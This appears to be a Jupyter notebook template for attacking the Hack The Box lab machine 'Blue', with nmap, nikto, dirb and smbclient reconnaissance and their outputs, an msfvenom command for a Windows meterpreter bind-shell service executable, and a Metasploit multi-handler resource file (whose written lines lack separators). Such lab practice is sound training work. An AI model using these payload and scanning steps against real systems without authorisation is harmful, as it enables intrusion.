# HacktheBox

## Global Settings

In [9]:
# Single Box
nickname = "blue"         # Name of the box
dnsName = "blue.htb"
aIP = '10.10.10.40'

# 2v2 Player Cyber Recon
#a2IP = ['10.10.110.101', '10.10.110.102']
#d2IP = ['10.10.110.103', '10.10.110.104']

# 4v4 Player Cyber Recon
#a4IP = ['10.10.110.101', '10.10.110.102', '10.10.110.103', '10.10.110.104']
#d4IP = ['10.10.110.105', '10.10.110.106', '10.10.110.107', '10.10.110.108']



## Output Locations

In [10]:
# Create the Output Directory for the Below Information Gathered
currentDir = "/home/kali/hackthebox"
outputDir = currentDir + "/output"
print("Output Directory:" + outputDir)
!mkdir -p $outputDir

# Create directories for the box
boxDir = outputDir + "/" + nickname
print("Box Directory:" + boxDir)
!mkdir -p $boxDir

Output Directory:/home/kali/hackthebox/output
Box Directory:/home/kali/hackthebox/output/blue


<a id="index"></a>
## Index

[nmap](#nmap)

[nmap all the ports](#nmapall)

[nmap scripts default and safe](#nmapscripts)

[nikto](#nikto)

[dirb](#dirb)

[smbclient](#smbclient)

[Create msfvenom payloads](#msfvenom)

[metasploit multi-handler](#multihandler)

[Linux privesc](#linuxprivesc)

<a id="nmap"></a>
## nmap 

[Back to Index](#index)

Command: nmap -sV --ipaddr-- -oN nmap

In [11]:
outputLocation = boxDir + '/nmap.txt'
!nmap -sV $aIP -oN $outputLocation

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-26 10:43 EST
Nmap scan report for 10.10.10.40
Host is up (0.085s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.02 seconds


<a id="nmapall"></a>
## nmap All TCP ports

[Back to Index](#index)

Command: nmap -sV -p- --ipaddr-- -oN nmap

In [ ]:
outputLocation = boxDir + '/nmapAll.txt'
!nmap -sV $aIP -oN $outputLocation

<a id="nmapscripts"></a>
## nmap scripts default,safe

[Back to Index](#index)

Command: nmap -sV --scripts default,safe --ipaddr-- -oN nmapScripts

In [12]:
outputLocationScripts = boxDir + '/nmapScripts.txt'
!nmap -sV --script default,safe $aIP -oN $outputLocationScripts

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-26 10:46 EST
Pre-scan script results:
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.10.40
Host is up (0.088s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m07s, deviation: 1s, median: 2m06s
| dns-blacklist: 
|   PROXY
|     tor.dan.me.uk 

| reverse-index: 
|   135/tcp: 10.10.10.40
|   139/tcp: 10.10.10.40
|   445/tcp: 10.10.10.40
|   49152/tcp: 10.10.10.40
|   49153/tcp: 10.10.10.40
|   49154/tcp: 10.10.10.40
|   49155/tcp: 10.10.10.40
|   49156/tcp: 10.10.10.40
|_  49157/tcp: 10.10.10.40
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 134.81 seconds


In [ ]:
# Gather the ports of the web servers present
results = !cat $outputLocation | grep "/tcp" 
webserverPortList = []
print("Possible web servers running:")
for r in results:
    if "/tcp" in r and "open" in r and "Apache" in r:
        print(r)

<a id="nikto"></a>
## nikto

[Back to Index](#index)

In [ ]:
### nikto settings
outputLocationNikto = boxDir + "/nikto.csv"
url="http://" + dnsName
!nikto -h $aIP -o $outputLocationNikto -p 80
#!nikto -h $url -o $outputLocationNikto

# Below is how to scan multiple ports
#!nikto -h $aIP -o $outputLocation -p 80,443  

<a id="dirb"></a>
## dirb

[Back to Index](#index)

In [ ]:
### dirb settings
outputLocationDirb = boxDir + "/dirb2.txt"
#url="http://" + dnsName
url="http://" + aIP
wordlist="/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt"
# -w does not stop on warning messages
#!dirb $url $wordlist -w -o $outputLocationDirb
!dirb $url -o $outputLocationDirb

<a id="smbclient"></a>
## smbclient

[Back to Index](#index)


In [13]:
!smbclient -L $aIP -U anonymous --no-pass


	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Share           Disk      
	Users           Disk      
SMB1 disabled -- no workgroup available


<a id="msfvenom"></a>
## msfvenom payload Creation

[Back to Index](#index)

Reference: https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/

Create an executable that can be run as a windows service to start a bind shell
````
msfvenom -p windows/x64/meterpreter/bind_tcp lport=8090 -f exe-service
````

<a id="multihandler"></a>
## Metasploit Multi-Handler Setup

[Back to Index](#index)

Setup: Creates a multihandler file for a metasploit payload being executed or other payload that could connect back

In [14]:
port=8090
outputLocationmhandler = boxDir + "/mhandler.rc"
f = open(outputLocationmhandler, 'w')
f.write("use exploit/multi/handler")
f.write("set payload windows/x64/meterpreter/bind_tcp")
f.write("set RHOSTS " + aIP)
f.write("set RPORT " + str(port))
f.close()

print("Execute to Start: msfconsole -r " + outputLocationmhandler)

msfconsole -r /home/kali/hackthebox/output/blue/mhandler.rc


<a id="linuxprivesc"></a>
## Linux privesc

[Back to Index](#index)

LinEnum - https://github.com/rebootuser/LinEnum

LinPeas - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh